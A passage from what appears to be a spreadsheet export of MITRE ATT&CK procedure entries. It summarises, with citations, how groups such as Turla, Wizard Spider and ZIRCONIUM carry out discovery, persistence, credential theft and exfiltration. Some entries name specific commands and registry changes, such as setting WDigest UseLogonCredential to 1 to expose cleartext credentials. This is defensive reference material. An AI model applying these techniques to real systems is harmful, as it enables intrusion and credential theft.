    <t>[Turla](https://attack.mitre.org/groups/G0010) has used compromised servers as infrastructure.(Citation: Recorded Future Turla Infra 2020)(Citation: Accenture HyperStack October 2020)(Citation: Talos TinyTurla September 2021)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) attempted to trick targets into clicking on a link featuring a seemingly legitimate domain from Adobe.com to download their malware and gain initial access.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover operating system configuration details using the &lt;code&gt;systeminfo&lt;/code&gt; and &lt;code&gt;set&lt;/code&gt; commands.(Citation: Kaspersky Turla)(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover network configuration details using the &lt;code&gt;arp -a&lt;/code&gt;, &lt;code&gt;nbtstat -n&lt;/code&gt;, &lt;code&gt;net config&lt;/code&gt;, &lt;code&gt;ipconfig /all&lt;/code&gt;, and &lt;code&gt;route&lt;/code&gt; commands, as well as [NBTscan](https://attack.mitre.org/software/S0590).(Citation: Kaspersky Turla)(Citation: Symantec Waterbug Jun 2019)(Citation: ESET ComRAT May 2020) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also retrieved registered RPC interface information from process memory.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover active local network connections using the &lt;code&gt;netstat -an&lt;/code&gt;, &lt;code&gt;net use&lt;/code&gt;, &lt;code&gt;net file&lt;/code&gt;, and &lt;code&gt;net session&lt;/code&gt; commands.(Citation: Kaspersky Turla)(Citation: ESET ComRAT May 2020) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also enumerated the IPv4 TCP connection table via the &lt;code&gt;GetTcpTable2&lt;/code&gt; API call.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover running services and associated processes using the &lt;code&gt;tasklist /svc&lt;/code&gt; command.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover the system time by using the &lt;code&gt;net time&lt;/code&gt; command.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has obtained and customized publicly-available tools like [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Symantec Waterbug Jun 2019)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used the VPS infrastructure of compromised Iranian threat actors.(Citation: NSA NCSC Turla OilRig)</t>
  </si>
  <si>
    <t xml:space="preserve">[Turla](https://attack.mitre.org/groups/G0010) has used VBS scripts throughout its operations.(Citation: Symantec Waterbug Jun 2019)	</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used HTTP and HTTPS for C2 communications.(Citation: ESET Turla Mosquito Jan 2018)(Citation: ESET Turla Mosquito May 2018)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used legitimate web services including Pastebin, Dropbox, and GitHub for C2 communications.(Citation: Accenture HyperStack October 2020)(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has frequently used compromised WordPress sites for C2 infrastructure.(Citation: Recorded Future Turla Infra 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has created web accounts including Dropbox and GitHub for C2 and document exfiltration.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have used cmd.exe to execute commands.(Citation: ESET Turla PowerShell May 2019)(Citation: Symantec Waterbug Jun 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Turla](https://attack.mitre.org/groups/G0010) has gathered credentials from the Windows Credential Manager tool.(Citation: Symantec Waterbug Jun 2019)	</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used WMI event filters and consumers to establish persistence.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) established persistence by adding a Shell value under the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&lt;/code&gt;.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Volatile Cedar](https://attack.mitre.org/groups/G0123) has targeted publicly facing web servers, with both automatic and manual vulnerability discovery.(Citation: CheckPoint Volatile Cedar March 2015) (Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>[Volatile Cedar](https://attack.mitre.org/groups/G0123) can deploy additional tools.(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t>[Volatile Cedar](https://attack.mitre.org/groups/G0123) has performed vulnerability scans of the target server.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Volatile Cedar](https://attack.mitre.org/groups/G0123) can inject web shell code into a server.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>[Volatile Cedar](https://attack.mitre.org/groups/G0123) has used DirBuster and GoBuster to brute force web directories and DNS subdomains.(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t>[WIRTE](https://attack.mitre.org/groups/G0090) has used Base64 to decode malicious VBS script.(Citation: Lab52 WIRTE Apr 2019)</t>
  </si>
  <si>
    <t>[WIRTE](https://attack.mitre.org/groups/G0090) has downloaded PowerShell code from the C2 server to be executed.(Citation: Lab52 WIRTE Apr 2019)</t>
  </si>
  <si>
    <t>[WIRTE](https://attack.mitre.org/groups/G0090) has attempted to lure users into opening malicious MS Word and Excel files to execute malicious payloads.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[WIRTE](https://attack.mitre.org/groups/G0090) has named a first stage dropper `Kaspersky Update Agent` in order to appear legitimate.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[WIRTE](https://attack.mitre.org/groups/G0090) has used HTTPS over ports 2083 and 2087 for C2.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[WIRTE](https://attack.mitre.org/groups/G0090) has used PowerShell for script execution.(Citation: Lab52 WIRTE Apr 2019)</t>
  </si>
  <si>
    <t>[WIRTE](https://attack.mitre.org/groups/G0090) has used `regsvr32.exe` to trigger the execution of a malicious script.(Citation: Lab52 WIRTE Apr 2019)</t>
  </si>
  <si>
    <t>[WIRTE](https://attack.mitre.org/groups/G0090) has sent emails to intended victims with malicious MS Word and Excel attachments.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[WIRTE](https://attack.mitre.org/groups/G0090) has obtained and used [Empire](https://attack.mitre.org/software/S0363) for post-exploitation activities.(Citation: Lab52 WIRTE Apr 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[WIRTE](https://attack.mitre.org/groups/G0090) has used VBScript  in its operations.(Citation: Lab52 WIRTE Apr 2019)	</t>
  </si>
  <si>
    <t xml:space="preserve">[WIRTE](https://attack.mitre.org/groups/G0090) has used HTTP for network communication.(Citation: Lab52 WIRTE Apr 2019)	</t>
  </si>
  <si>
    <t>[Whitefly](https://attack.mitre.org/groups/G0107) has used a simple remote shell tool that will call back to the C2 server and wait for commands.(Citation: Symantec Whitefly March 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Whitefly](https://attack.mitre.org/groups/G0107) has used search order hijacking to run the loader Vcrodat.(Citation: Symantec Whitefly March 2019)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Whitefly](https://attack.mitre.org/groups/G0107) has used an open-source tool to exploit a known Windows privilege escalation vulnerability (CVE-2016-0051) on unpatched computers.(Citation: Symantec Whitefly March 2019)	</t>
  </si>
  <si>
    <t>[Whitefly](https://attack.mitre.org/groups/G0107) has the ability to download additional tools from the C2.(Citation: Symantec Whitefly March 2019)</t>
  </si>
  <si>
    <t>[Whitefly](https://attack.mitre.org/groups/G0107) has used [Mimikatz](https://attack.mitre.org/software/S0002) to obtain credentials.(Citation: Symantec Whitefly March 2019)</t>
  </si>
  <si>
    <t>[Whitefly](https://attack.mitre.org/groups/G0107) has used malicious .exe or .dll files disguised as documents or images.(Citation: Symantec Whitefly March 2019)</t>
  </si>
  <si>
    <t>[Whitefly](https://attack.mitre.org/groups/G0107) has named the malicious DLL the same name as DLLs belonging to legitimate software from various security vendors.(Citation: Symantec Whitefly March 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Whitefly](https://attack.mitre.org/groups/G0107) has encrypted the payload used for C2.(Citation: Symantec Whitefly March 2019)	</t>
  </si>
  <si>
    <t>[Whitefly](https://attack.mitre.org/groups/G0107) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Symantec Whitefly March 2019)</t>
  </si>
  <si>
    <t>[Windigo](https://attack.mitre.org/groups/G0124) has used a Perl script for information gathering.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Windigo](https://attack.mitre.org/groups/G0124) has used a script to gather credentials in files left on disk by OpenSSH backdoors.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Windigo](https://attack.mitre.org/groups/G0124) has distributed Windows malware via drive-by downloads.(Citation: ESET Windigo Mar 2014)</t>
  </si>
  <si>
    <t>[Windigo](https://attack.mitre.org/groups/G0124) has used a script to check for the presence of files created by OpenSSH backdoors.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Windigo](https://attack.mitre.org/groups/G0124) has delivered a generic Windows proxy Win32/Glubteta.M. [Windigo](https://attack.mitre.org/groups/G0124) has also used multiple reverse proxy chains as part of their C2 infrastructure.(Citation: ESET Windigo Mar 2014)</t>
  </si>
  <si>
    <t>[Windigo](https://attack.mitre.org/groups/G0124) has used a script to detect installed software on targeted systems.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Windigo](https://attack.mitre.org/groups/G0124) has used a script to detect which Linux distribution and version is currently installed on the system.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used compromised websites to register custom URL schemes on a remote system.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used tools to deploy additional payloads to compromised hosts.(Citation: BlackBerry Bahamut)</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used revoked certificates to sign malware.(Citation: objective-see windtail1 dec 2018)(Citation: SANS Windshift August 2018)</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used e-mail attachments to lure victims into executing malicious code.(Citation: SANS Windshift August 2018)</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used links embedded in e-mails to lure victims into executing malicious code.(Citation: SANS Windshift August 2018)</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used icons mimicking MS Office files to mask malicious executables.(Citation: objective-see windtail1 dec 2018) [Windshift](https://attack.mitre.org/groups/G0112) has also attempted to hide executables by changing the file extension to ".scr" to mimic Windows screensavers.(Citation: BlackBerry Bahamut)</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used string encoding with floating point calculations.(Citation: BlackBerry Bahamut)</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used malware to enumerate active processes.(Citation: BlackBerry Bahamut)</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has created LNK files in the Startup folder to establish persistence.(Citation: BlackBerry Bahamut)</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used malware to identify installed AV and commonly used forensic and malware analysis tools.(Citation: BlackBerry Bahamut)</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used malware to identify installed software.(Citation: BlackBerry Bahamut)</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has sent spearphishing emails with attachment to harvest credentials and deliver malware.(Citation: SANS Windshift August 2018)</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has sent spearphishing emails with links to harvest credentials and deliver malware.(Citation: SANS Windshift August 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Windshift](https://attack.mitre.org/groups/G0112) has used fake personas on social media to engage and target victims.(Citation: SANS Windshift August 2018)	</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used malware to identify the computer name of a compromised host.(Citation: BlackBerry Bahamut)</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used malware to identify the username on a compromised host.(Citation: BlackBerry Bahamut)</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used Visual Basic 6 (VB6) payloads.(Citation: BlackBerry Bahamut)</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used tools that communicate with C2 over HTTP.(Citation: BlackBerry Bahamut)</t>
  </si>
  <si>
    <t>[Windshift](https://attack.mitre.org/groups/G0112) has used WMI to collect information about target machines.(Citation: BlackBerry Bahamut)</t>
  </si>
  <si>
    <t>[Winnti Group](https://attack.mitre.org/groups/G0044) used stolen certificates to sign its malware.(Citation: Kaspersky Winnti April 2013)</t>
  </si>
  <si>
    <t>[Winnti Group](https://attack.mitre.org/groups/G0044) has registered domains for C2 that mimicked sites of their intended targets.(Citation: Kaspersky Winnti April 2013)</t>
  </si>
  <si>
    <t>[Winnti Group](https://attack.mitre.org/groups/G0044) has used a program named ff.exe to search for specific documents on compromised hosts.(Citation: Kaspersky Winnti April 2013)</t>
  </si>
  <si>
    <t>[Winnti Group](https://attack.mitre.org/groups/G0044) has downloaded an auxiliary program named ff.exe to infected machines.(Citation: Kaspersky Winnti April 2013)</t>
  </si>
  <si>
    <t>[Winnti Group](https://attack.mitre.org/groups/G0044) looked for a specific process running on infected servers.(Citation: Kaspersky Winnti April 2013)</t>
  </si>
  <si>
    <t>[Winnti Group](https://attack.mitre.org/groups/G0044) used a rootkit to modify typical server functionality.(Citation: Kaspersky Winnti April 2013)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used Digicert code-signing certificates for some of its malware.(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) obtained a code signing certificate signed by Digicert for some of its malware.(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has collected and staged credentials and network enumeration information, using  the networkdll and psfin [TrickBot](https://attack.mitre.org/software/S0266) modules.(Citation: CrowdStrike Grim Spider May 2019)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has shut down or uninstalled security applications on victim systems that might prevent ransomware from executing.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk's Return October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has identified domain admins through the use of “net group ‘Domain admins’” commands.(Citation: DFIR Ryuk's Return October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used administrative accounts, including Domain Admin, to move laterally within a victim network.(Citation: FireEye KEGTAP SINGLEMALT October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has injected malicious DLLs into memory with read, write, and execute permissions.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has exfiltrated domain credentials and network enumeration information over command and control (C2) channels.(Citation: CrowdStrike Grim Spider May 2019)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has exfiltrated victim information using FTP.(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has exploited or attempted to exploit Zerologon (CVE-2020-1472) and EternalBlue (MS17-010) vulnerabilities.(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk in 5 Hours October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has accessed victim networks by using stolen credentials to access the corporate VPN infrastructure.(Citation: FireEye KEGTAP SINGLEMALT October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used file deletion to remove some modules and configurations from an infected host after use.(Citation: CrowdStrike Grim Spider May 2019)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used Rubeus, MimiKatz Kerberos module, and the Invoke-Kerberoast cmdlet to steal AES hashes.(Citation: DFIR Ryuk's Return October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used the Invoke-Inveigh PowerShell cmdlets, likely for name service poisoning.(Citation: FireEye KEGTAP SINGLEMALT October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used stolen credentials to copy tools into the &lt;code&gt;%TEMP%&lt;/code&gt; directory of domain controllers.(Citation: CrowdStrike Grim Spider May 2019)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has lured victims to execute malware with spearphishing attachments containing macros to download either [Emotet](https://attack.mitre.org/software/S0367), Bokbot, [TrickBot](https://attack.mitre.org/software/S0266), or [Bazar](https://attack.mitre.org/software/S0534).(Citation: CrowdStrike Grim Spider May 2019)(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has lured victims into clicking a malicious link delivered through spearphishing.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used scheduled tasks to install [TrickBot](https://attack.mitre.org/software/S0266), using task names to appear legitimate such as WinDotNet, GoogleTask, or Sysnetsf.(Citation: CrowdStrike Grim Spider May 2019) It has also used common document file names for other malware binaries.(Citation: FireEye KEGTAP SINGLEMALT October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has modified the Registry key &lt;code&gt;HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest&lt;/code&gt; by setting the &lt;code&gt;UseLogonCredential&lt;/code&gt; registry value to &lt;code&gt;1&lt;/code&gt; in order to force credentials to be stored in clear text in memory.(Citation: CrowdStrike Grim Spider May 2019)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has gained access to credentials via exported copies of the ntds.dit Active Directory database.(Citation: FireEye KEGTAP SINGLEMALT October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used the “net view” command to locate mapped network shares.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) used Base64 encoding to obfuscate an [Empire](https://attack.mitre.org/software/S0363) service and PowerShell commands.(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: DFIR Ryuk's Return October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used macros to execute PowerShell scripts to download malware on victim's machines.(Citation: CrowdStrike Grim Spider May 2019) It has also used PowerShell to execute commands and move laterally through a victim network.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has established persistence via the Registry key HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and a shortcut within the startup folder.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used RDP for lateral movement.(Citation: CrowdStrike Grim Spider May 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used networkdll for network discovery and psfin specifically for financial and point of sale indicators. [Wizard Spider](https://attack.mitre.org/groups/G0102) has also used [AdFind](https://attack.mitre.org/software/S0552) and &lt;code&gt;nltest/dclist&lt;/code&gt; to enumerate domain computers, including the domain controller.(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: CrowdStrike Grim Spider May 2019)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: DFIR Ryuk's Return October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used SMB to drop Cobalt Strike Beacon on a domain controller for lateral movement.(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)(Citation: DFIR Ryuk's Return October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used scheduled tasks establish persistence for [TrickBot](https://attack.mitre.org/software/S0266) and other malware.(Citation: CrowdStrike Grim Spider May 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has acquired credentials from the SAM/SECURITY registry hives.(Citation: FireEye KEGTAP SINGLEMALT October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used WMI to identify anti-virus products installed on a victim's machine.(Citation: DFIR Ryuk's Return October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used services.exe to execute scripts and executables during lateral movement within a victim network.(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk in 5 Hours October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used taskkill.exe and net.exe to stop backup, catalog, cloud, and other services prior to network encryption.(Citation: DFIR Ryuk's Return October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used spearphishing attachments to deliver Microsoft documents containing macros or PDFs containing malicious links to download either [Emotet](https://attack.mitre.org/software/S0367), Bokbot, [TrickBot](https://attack.mitre.org/software/S0266), or [Bazar](https://attack.mitre.org/software/S0534).(Citation: CrowdStrike Grim Spider May 2019)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has sent phishing emails containing a link to an actor-controlled Google Drive document or other free online file hosting services.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used “systeminfo” and similar commands to acquire detailed configuration information of a victim machine.(Citation: DFIR Ryuk's Return October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used "ipconfig" to identify the network configuration of a victim machine.(Citation: Sophos New Ryuk Attack October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used "whoami" to identify the local user and their privileges.(Citation: Sophos New Ryuk Attack October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has obtained and used publicly-available post-exploitation frameworks and tools like Metasploit, [Empire](https://attack.mitre.org/software/S0363), [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: FireEye KEGTAP SINGLEMALT October 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Wizard Spider](https://attack.mitre.org/groups/G0102) has used valid credentials for privileged accounts with the goal of accessing domain controllers.(Citation: CrowdStrike Grim Spider May 2019) </t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used HTTP for network communications.(Citation: CrowdStrike Grim Spider May 2019)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used cmd.exe to execute commands on a victim's machine.(Citation: DFIR Ryuk's Return October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used the icacls command to modify access control to backup servers, providing them with full control of all the system folders.(Citation: Sophos New Ryuk Attack October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used WMI and LDAP queries for network discovery and to move laterally.(Citation: CrowdStrike Grim Spider May 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has used Window Remote Management to move laterally through a victim network.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has installed [TrickBot](https://attack.mitre.org/software/S0266) as a service named ControlServiceA in order to establish persistence.(Citation: CrowdStrike Grim Spider May 2019)</t>
  </si>
  <si>
    <t>[Wizard Spider](https://attack.mitre.org/groups/G0102) has established persistence using Userinit by adding the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.(Citation: FireEye KEGTAP SINGLEMALT October 2020)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used Dropbox for C2 allowing upload and download of files as well as execution of arbitrary commands.(Citation: Google Election Threats October 2020)(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used a tool to steal credentials from installed web browsers including Microsoft Internet Explorer and Google Chrome.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used the AES256 algorithm with a SHA1 derived key to decrypt exploit code.(Citation: Check Point APT31 February 2021)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has purchased domains for use in targeted campaigns.(Citation: Microsoft Targeting Elections September 2020)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has exfiltrated files via the Dropbox API C2.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has exfiltrated stolen data to Dropbox.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has exploited CVE-2017-0005 for local privilege escalation.(Citation: Check Point APT31 February 2021)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used tools to download malicious files to compromised hosts.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used malicious links in e-mails to lure victims into downloading malware.(Citation: Google Election Threats October 2020)(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has created a run key named &lt;code&gt;Dropbox Update Setup&lt;/code&gt; to mask a persistence mechanism for a malicious binary.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has spoofed legitimate applications in phishing lures and changed file extensions to conceal  installation of malware.(Citation: Google Election Threats October 2020)(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used the msiexec.exe command-line utility to download and execute malicious MSI files.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) targeted presidential campaign staffers with credential phishing e-mails.(Citation: Google Election Threats October 2020)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used Python-based implants to interact with compromised hosts.(Citation: Google Election Threats October 2020)(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
    <t>[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used a tool to query the Registry for proxy settings.(Citation: Zscaler APT31 Covid-19 October 2020)</t>
  </si>
  <si>
